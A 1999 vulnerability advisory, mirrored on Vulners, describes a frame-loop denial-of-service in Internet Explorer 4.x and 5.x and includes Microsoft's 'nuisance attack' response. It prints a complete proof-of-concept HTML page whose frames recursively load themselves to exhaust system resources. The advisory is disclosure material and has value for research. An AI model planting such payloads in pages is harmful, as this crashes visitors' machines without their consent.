Vulners
Lucene search
ie.frameloop.txt
🗓️ 09 Dec 1999 00:00:00Reported by Underground Security Systems ResearchType 
packetstorm🔗 packetstormsecurity.com👁 20 Views
`Microsoft Internet Explorer 4.x 5.x - Frame Loop Vulnerability
PROBLEM:
It is possible to create a malicious webpage that when visited by an IE user
all of their system resources are devoured and depending on the system its
possible that the machine can even crash and reboot itself.
The reason you can use up all of the client's resources is by creating an
endless loop of frames. You create a html file that has a few frames inside
it and then link those frames back to the same html file so every time IE
loads the new frame it loads another new frame and another etc... until
after a short time your resources are all used up and your system crashes.
We understand this is somewhat of a nuisance hole but still something that
needs to be addressed.
Example:
-----------readme.htm------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<head>
<title>Ussrlabs is getting hard</title>
</head>
<frameset framespacing="2" frameborder="no" rows="65,*">
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<noframes>
<body bgcolor="#FFFFFF">
<p>This web page uses frames, but your browser doesn't support them.</p>
</body>
</noframes>
</frameset>
<frameset>
<noframes>
</noframes>
</frameset>
</html>
-----------readme.htm------------
Or if you want the html can be downloaded here.
http://www.ussrback.com/iehole/readme.zip
Note: It also affect Microsoft FrontPage.
Vendor Status:
Contacted.
"We talked to MS and they said this is a nuisance attack and do not think
its a security hole. So you will not be getting a patch for this(maybe).
However, it is good to know that Netscape Navigator is not affected by this
hole."
Vendor Url: http://www.microsoft.com/
Program Url: http://www.microsoft.com/windows/ie/default.htm
Credit:
USSRLABS
SOLUTION:
Nothing yet.
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
http://www.ussrback.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Dec 1999 00:00Current
7.4High risk
Vulners AI Score7.4